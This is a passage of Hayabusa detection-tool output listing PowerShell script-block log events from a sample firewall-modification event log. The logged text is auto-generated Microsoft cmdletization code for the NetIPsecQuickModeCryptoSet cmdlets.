($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] 
[string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] 
${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [Syst",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } 
} catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] 
[Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdleti",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:45.329 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"em.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } 
} catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, 
[Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, 